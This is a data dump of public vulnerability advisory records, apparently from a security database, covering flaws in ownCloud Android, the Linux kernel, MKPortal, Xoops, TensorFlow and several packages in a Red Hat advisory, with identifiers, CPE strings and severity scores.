ownCloud owncloud/android before 2.20 has Incorrect Access Control for physically proximate attackers.
[ "cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:android:*:*" ]
null
6.8
null
4.6
GHSA-c942-c798-26vh
The print_fatal_signal function in kernel/signal.c in the Linux kernel before 2.6.32.4 on the i386 platform, when print-fatal-signals is enabled, allows local users to discover the contents of arbitrary memory locations by jumping to an address and then reading a log file, and might allow local users to cause a denial of service (system slowdown or crash) by jumping to an address.
[]
null
null
null
null
GHSA-277x-wqvr-c5w3
PHP remote file inclusion vulnerability in include/user.php in the NoBoard BETA module for MKPortal allows remote attackers to execute arbitrary PHP code via a URL in the MK_PATH parameter.
[]
null
null
null
null
GHSA-2xvq-9rfm-jm69
SQL injection vulnerability in index.php in the Tiny Event (tinyevent) 1.01 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the id parameter in a show action.
[]
null
null
null
null
PYSEC-2019-210
null
NULL pointer dereference in Google TensorFlow before 1.12.2 could cause a denial of service via an invalid GIF file.
[]
null
null
null
null
RHSA-2025:8385
Red Hat Security Advisory: A Subscription Management tool for finding and reporting Red Hat product usage
vim: use-after-free in function ins_compl_get_exp in vim/vim libexpat: expat: Improper Restriction of XML Entity Expansion Depth in libexpat rsync: Path traversal vulnerability in rsync rsync: --safe-links option bypass leads to path traversal libtasn1: Inefficient DER Decoding in libtasn1 Leading to Potential Remote DoS gnutls: GnuTLS Impacted by Inefficient DER Decoding in libtasn1 Leading to Remote DoS rsync: Race Condition in rsync Handling Symbolic Links requests: subsequent requests to the same host ignore cert verification git: The sideband payload is passed unfiltered to the terminal in git python: cpython: URL parser allowed square brackets in domain names krb5: overflow when calculating ulog block size openssh: Machine-in-the-middle attack if VerifyHostKeyDNS is enabled
[ "cpe:/a:redhat:discovery:1.14::el9" ]
null
6.8
null
null